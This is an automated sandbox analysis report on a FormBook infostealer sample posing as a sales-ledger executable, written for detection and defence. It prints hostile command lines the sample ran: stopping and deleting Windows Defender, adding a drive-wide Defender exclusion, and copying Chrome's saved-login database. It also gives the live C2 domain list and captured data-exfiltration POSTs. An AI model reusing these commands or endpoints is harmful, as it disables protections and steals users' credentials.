Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Require your Sales Ledger from 01-April-2020.exe

Overview

General Information

Sample Name:Require your Sales Ledger from 01-April-2020.exe
Analysis ID:385451
MD5:c7c27e1859f1593aedb1eebf0a15175e
SHA1:deb5544c037a7757462afab46ae2ca14a8f7f945
SHA256:d7e71646c9427067e810e1b278beb6ad1f07e6b0c5003d9be2611178e4f5470c
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Costura Assembly Loader
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Require your Sales Ledger from 01-April-2020.exe (PID: 5792 cmdline: 'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe' MD5: C7C27E1859F1593AEDB1EEBF0A15175E)
    • AdvancedRun.exe (PID: 2644 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6200 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 6332 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 7124 cmdline: 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 2420 cmdline: 'powershell' Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Require your Sales Ledger from 01-April-2020.exe (PID: 6300 cmdline: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe MD5: C7C27E1859F1593AEDB1EEBF0A15175E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6856 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 2644 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.consultoramulticars.com/suod/"], "decoy": ["ynyshs.com", "freethegameboy.info", "mpsaklera.com", "neverlunar.icu", "coffeegoeth.com", "your-card.net", "rmcorredores.com", "binaconsa.com", "themovingmountains.com", "payalbansalinteriordesign.com", "dglala.com", "bettermelifestyle.com", "catnipny.com", "wwwpinxixi.com", "41dongbu.com", "fsdhgfdhkjgfhgsdf.com", "maemarienaturally.com", "1rugbycoachblog.com", "yax53.com", "vv4065.com", "gokcensesli.com", "huangshewangzhan.com", "ubiqshop.com", "therealfeelbeauty.net", "gotanie.com", "magentos6.com", "dektebopdtdl.support", "balabala.run", "skmagicjiksoohalawati.com", "systemandsystems.com", "theprismaticbody.com", "admiralsecuritysolutions.com", "seguro123.com", "uniquetips.net", "benugo-online.com", "domentemenegi24.com", "wisepinch.com", "wujinglingwudao.com", "teachmehowtomortgage.com", "prime-living.wien", "cancelrockethomes.com", "magickennels.info", "fytsky.com", "hyeonjin.net", "cecisgiftstore.com", "bikinibut.com", "laurakonner.com", "pissedoffpainters.com", "colec2c.com", "africandirectors.com", "criss-nutricionymakeup.com", "mathwithprofessorpi.com", "soretyje.com", "sellingparadiseproperties.com", "pinscan1502.com", "lifeunscriptedfilms.com", "alhula.com", "slutdating.online", "sofiadumonde.com", "dasanyang995.com", "fit2x.com", "seniorlivingcaelderly.com", "21stglobalequipments.com", "xiamencapital.com"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Require your Sales Ledger from 01-April-2020.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1590f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18429:$sqlite3step: 68 34 1C 7B E1
        • 0x1853c:$sqlite3step: 68 34 1C 7B E1
        • 0x18458:$sqlite3text: 68 38 2A 90 C5
        • 0x1857d:$sqlite3text: 68 38 2A 90 C5
        • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
        00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 25 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
                24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
                • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                • 0x14895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
                • 0x14381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
                • 0x14997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
                • 0x14b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
                • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
                • 0x135fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
                • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
                • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
                • 0x1b71a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
                24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
                • 0x17629:$sqlite3step: 68 34 1C 7B E1
                • 0x1773c:$sqlite3step: 68 34 1C 7B E1
                • 0x17658:$sqlite3text: 68 38 2A 90 C5
                • 0x1777d:$sqlite3text: 68 38 2A 90 C5
                • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
                • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
                24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  Click to see the 5 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Steal Google chrome login dataShow sources
                  Source: Process startedAuthor: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmmon32.exe, ParentImage: C:\Windows\SysWOW64\cmmon32.exe, ParentProcessId: 6856, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 2644

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.consultoramulticars.com/suod/"], "decoy": ["ynyshs.com", "freethegameboy.info", "mpsaklera.com", "neverlunar.icu", "coffeegoeth.com", "your-card.net", "rmcorredores.com", "binaconsa.com", "themovingmountains.com", "payalbansalinteriordesign.com", "dglala.com", "bettermelifestyle.com", "catnipny.com", "wwwpinxixi.com", "41dongbu.com", "fsdhgfdhkjgfhgsdf.com", "maemarienaturally.com", "1rugbycoachblog.com", "yax53.com", "vv4065.com", "gokcensesli.com", "huangshewangzhan.com", "ubiqshop.com", "therealfeelbeauty.net", "gotanie.com", "magentos6.com", "dektebopdtdl.support", "balabala.run", "skmagicjiksoohalawati.com", "systemandsystems.com", "theprismaticbody.com", "admiralsecuritysolutions.com", "seguro123.com", "uniquetips.net", "benugo-online.com", "domentemenegi24.com", "wisepinch.com", "wujinglingwudao.com", "teachmehowtomortgage.com", "prime-living.wien", "cancelrockethomes.com", "magickennels.info", "fytsky.com", "hyeonjin.net", "cecisgiftstore.com", "bikinibut.com", "laurakonner.com", "pissedoffpainters.com", "colec2c.com", "africandirectors.com", "criss-nutricionymakeup.com", "mathwithprofessorpi.com", "soretyje.com", "sellingparadiseproperties.com", "pinscan1502.com", "lifeunscriptedfilms.com", "alhula.com", "slutdating.online", "sofiadumonde.com", "dasanyang995.com", "fit2x.com", "seniorlivingcaelderly.com", "21stglobalequipments.com", "xiamencapital.com"]}
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeReversingLabs: Detection: 29%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: Require your Sales Ledger from 01-April-2020.exeReversingLabs: Detection: 29%
                  Yara detected FormBookShow sources
                  Source: Yara matchFile source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeJoe Sandbox ML: detected
                  Machine Learning detection for sampleShow sources
                  Source: Require your Sales Ledger from 01-April-2020.exeJoe Sandbox ML: detected
                  Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  Source: Require your Sales Ledger from 01-April-2020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
                  Source: Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
                  Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
                  Source: Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
                  Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
                  Source: Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 4x nop then pop ebx24_2_00407B02
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 4x nop then pop edi24_2_00416CB0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx32_2_02B17B02
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi32_2_02B26CBF

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
                  Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
                  Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: www.consultoramulticars.com/suod/
                  Source: global trafficHTTP traffic detected: GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                  Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
                  Source: global trafficHTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 33 75 47 75 6b 51 61 35 53 36 56 69 54 57 6d 39 6a 53 45 32 58 6b 4b 76 38 59 64 69 57 54 74 39 54 48 37 67 6e 4b 39 75 39 7e 52 38 74 28 56 73 4f 71 31 55 47 78 35 47 79 46 56 44 4a 36 39 65 4e 49 55 34 54 4f 73 56 34 36 79 52 6c 35 48 44 6c 41 2d 67 35 59 54 53 35 68 31 30 73 72 77 6b 6f 4e 53 47 76 65 4c 74 54 4a 50 7a 73 4c 78 68 58 6d 67 39 32 5a 69 4d 7a 46 43 42 4f 6a 56 59 4e 48 68 53 31 68 78 30 49 78 47 4b 68 34 42 47 79 35 62 56 34 59 68 66 63 74 50 28 62 7a 62 36 38 43 6c 56 45 4b 33 65 47 33 51 49 46 4a 43 64 70 35 58 45 36 41 70 34 5a 63 68 6b 41 59 5f 57 73 43 79 38 50 4e 67 4b 4e 63 66 6c 6e 6a 6b 53 4d 53 78 6d 58 6a 47 4b 68 4a 4e 61 6a 46 62 72 79 77 5a 48 6a 41 41 31 39 68 45 39 64 57 4a 49 6f 31 6f 4b 63 4b 48 4a 31 41 63 4f 4c 7a 4a 73 7a 62 79 28 72 69 5f 72 4d 64 63 4f 30 5a 49 47 39 42 4a 79 77 43 78 61 32 72 51 42 45 33 5a 46 76 28 38 43 46 41 53 62 33 77 6b 76 63 5a 39 51 6a 63 77 61 6a 4c 48 32 4a 70 45 67 59 56 65 77 30 74 61 30 7a 74 30 77 70 53 4d 68 61 48 49 71 41 35 4a 75 7a 76 70 54 75 72 2d 65 78 4e 69 36 6d 58 44 5a 34 47 6d 52 62 72 39 65 66 52 63 70 42 46 5f 48 73 6a 67 7e 54 46 5f 61 4d 44 30 68 71 44 35 58 77 38 6e 71 42 37 69 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).
                  Source: global trafficHTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 170153Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 32 32 73 76 55 45 78 75 58 69 51 6a 44 6d 75 35 69 6a 62 79 55 67 5a 6f 72 30 7a 72 6b 57 79 39 54 57 38 70 47 62 6b 6b 38 4f 52 34 66 48 53 68 4f 71 32 57 47 78 36 43 79 49 73 64 72 72 77 65 49 6f 79 34 54 47 6a 62 66 4b 7a 51 31 35 51 43 46 4e 4c 6d 35 38 49 53 5f 68 41 30 50 48 6f 30 34 42 53 43 63 75 4e 78 6d 68 55 35 4e 58 45 73 48 4b 6c 37 7a 64 72 4d 45 31 51 48 74 65 47 51 70 48 6a 66 6c 5a 6d 7e 6f 68 71 4f 32 45 45 43 69 39 59 4a 70 4d 2d 63 37 46 4c 72 36 79 6f 6d 6f 57 6b 4c 67 75 44 62 46 28 69 4e 78 5a 52 65 35 49 6b 45 35 68 57 79 49 51 77 67 42 45 6e 56 64 4f 59 30 64 39 59 46 65 45 48 68 6b 4b 55 51 4d 69 4f 70 79 47 55 47 53 63 50 62 6c 42 4c 6c 77 41 69 42 53 38 4d 39 76 35 57 39 4b 4f 5f 58 59 45 34 51 4e 43 32 47 31 67 55 4a 49 66 5f 69 7a 61 55 39 72 69 7a 28 75 6c 4b 5a 6b 4e 44 57 75 4a 30 79 7a 54 30 51 46 76 33 45 48 44 42 59 36 44 58 4f 58 41 6b 44 32 78 5a 6b 38 64 36 54 77 73 41 62 6a 4c 6c 32 4d 64 54 67 59 56 6b 77 77 34 31 79 42 52 30 7a 62 61 6c 69 39 7a 79 69 67 35 75 69 44 28 72 63 38 7e 37 65 78 46 69 34 57 47 73 5a 50 69 6d 62 74 76 38 65 2d 52 63 70 78 46 5f 4b 4d 69 72 32 67 38 42 54 50 44 4d 71 61 6a 6a 59 32 56 57 67 42 32 36 4e 4b 28 35 46 6e 4a 79 6e 41 69 55 52 69 47 54 28 53 69 54 77 52 75 57 53 75 78 48 71 49 48 68 37 42 44 4e 53 75 55 6d 42 74 43 4c 71 31 67 6f 48 36 64 4b 56 4e 47 57 28 67 47 6e 7e 78 28 74 28 62 6b 56 6c 72 74 56 7a 78 35 69 6f 5f 47 65 36 57 73 63 56 62 4f 73 57 45 36 37 33 34 6b 5f 58 69 6c 6c 36 77 4d 36 66 73 70 4c 7e 48 45 50 42 34 45 62 34 42 54 44 37 49 4c 56 31 4b 7e 44 69 54 4e 69 38 4f 73 59 36 42 63 42 78 30 65 49 71 38 5a 34 45 53 48 67 55 75 58 47 53 66 74 6e 30 45 72 45 77 74 73 56 32 63 33 6b 45 37 65 76 42 65 61 46 64 5a 56 32 74 56 58 74 6f 59 31 6c 44 62 4c 73 36 38 30 6c 62 53 69 51 6c 6b 70 46 50 36 62 50 64 46 33 48 30 74 57 4a 7a 49 64 41 44 72 36 6f 37 71 54 51 28 30 49 33 56 51 44 72 7a 35 6a 73 6f 62 46 43 38 71 66 6b 48 51 6b 66 67 65 78 52 36 58 28 39 74 56 56 6d 66 46 73 65 62 74 36 73 6c 53 50 30 6a 56 66 50 4f 36 57 48 52 52 4b 66 63 38 69 73 62 54 7e 52 76 32 52 54 51 30 58 78 66 6b 4d 62 4c 68 54 41 38 74 73 68 4b 31 31 34 46 47 42 7a 38 56 74 52 42 56 73 42 28 6c 6e 4a 51 62 30 35 50 76 48 51 6d 32 45 75 4d 6d 62 48 28 2d 34 57 79 4f 55 75 4a 7a 53 6a 39 56 64 73 65 50 28 4e 74 4a 62 30 54 30 59 50 4e 6b 55 73 4d 71 6e 76 72 4f 53 57 37 30 38 47 69 62 64 6a 33 4c 73 51 76 34 64 74 6a 45 30 4c 41 7a 7e 42 67 51 63 4d 78 64 28 76 72 5a 64 4a 4a 42 4d 76 28 44 30 46 30 41 57 38 4e 4a 77 56 73
                  Source: C:\Windows\explorer.exeCode function: 25_2_061C67C2 getaddrinfo,setsockopt,recv,25_2_061C67C2
                  Source: global trafficHTTP traffic detected: GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                  Source: unknownDNS traffic detected: queries for: www.seniorlivingcaelderly.com
                  Source: unknownHTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 33 75 47 75 6b 51 61 35 53 36 56 69 54 57 6d 39 6a 53 45 32 58 6b 4b 76 38 59 64 69 57 54 74 39 54 48 37 67 6e 4b 39 75 39 7e 52 38 74 28 56 73 4f 71 31 55 47 78 35 47 79 46 56 44 4a 36 39 65 4e 49 55 34 54 4f 73 56 34 36 79 52 6c 35 48 44 6c 41 2d 67 35 59 54 53 35 68 31 30 73 72 77 6b 6f 4e 53 47 76 65 4c 74 54 4a 50 7a 73 4c 78 68 58 6d 67 39 32 5a 69 4d 7a 46 43 42 4f 6a 56 59 4e 48 68 53 31 68 78 30 49 78 47 4b 68 34 42 47 79 35 62 56 34 59 68 66 63 74 50 28 62 7a 62 36 38 43 6c 56 45 4b 33 65 47 33 51 49 46 4a 43 64 70 35 58 45 36 41 70 34 5a 63 68 6b 41 59 5f 57 73 43 79 38 50 4e 67 4b 4e 63 66 6c 6e 6a 6b 53 4d 53 78 6d 58 6a 47 4b 68 4a 4e 61 6a 46 62 72 79 77 5a 48 6a 41 41 31 39 68 45 39 64 57 4a 49 6f 31 6f 4b 63 4b 48 4a 31 41 63 4f 4c 7a 4a 73 7a 62 79 28 72 69 5f 72 4d 64 63 4f 30 5a 49 47 39 42 4a 79 77 43 78 61 32 72 51 42 45 33 5a 46 76 28 38 43 46 41 53 62 33 77 6b 76 63 5a 39 51 6a 63 77 61 6a 4c 48 32 4a 70 45 67 59 56 65 77 30 74 61 30 7a 74 30 77 70 53 4d 68 61 48 49 71 41 35 4a 75 7a 76 70 54 75 72 2d 65 78 4e 69 36 6d 58 44 5a 34 47 6d 52 62 72 39 65 66 52 63 70 42 46 5f 48 73 6a 67 7e 54 46 5f 61 4d 44 30 68 71 44 35 58 77 38 6e 71 42 37 69 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 